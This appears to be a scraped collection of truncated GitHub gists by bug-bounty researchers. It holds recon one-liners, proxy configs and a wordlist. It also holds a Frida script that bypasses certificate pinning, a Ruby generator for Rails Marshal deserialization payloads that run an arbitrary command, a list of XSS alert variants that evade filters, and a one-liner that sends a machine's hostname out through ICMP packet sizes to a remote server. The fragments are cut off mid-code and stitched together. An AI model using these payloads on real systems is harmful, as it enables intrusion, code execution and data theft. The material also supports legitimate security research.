arbazkiraak

wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt

0xatul

{
  "84kr3q1592995213323": {
    "type": 1,
    "color": "#cc883a",
    "title": "Burp",
    "active": true,
    "address": "127.0.0.1",
    "port": 8080,
    "proxyDNS": false,
    "username": "",

ignis-sec

{
	"30523382": {
		"className": "Proxy",
		"data": {
			"bypassFPForPAC": true,
			"color": "#f57575",
			"configUrl": "",
			"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
			"cycle": false,
			"enabled": true,

screetsec

curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed  "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do  URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u  Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt

yassineaboukir

0
00
01
02
03
1
1.0
10
100
1000

cubehouse

// start with:
//   frida -U -l pinning.js -f [APP_ID] --no-pause

Java.perform(function () {
    console.log('')
    console.log('===')
    console.log('* Injecting hooks into common certificate pinning methods *')
    console.log('===')

    var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');

rootxharsh

#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

rootxharsh

alias reconme='function frecon()
{
         mkdir $1
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
         mv report.html $1/report-$1.html
         sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
         chown -R www-data:www-data /var/www/html/recon
         touch /var/www/html/recon/$1/index.html

tomnomnom

// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

jobertabma

1. Capture ICMP packets on your server:

tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap

2. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:

ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done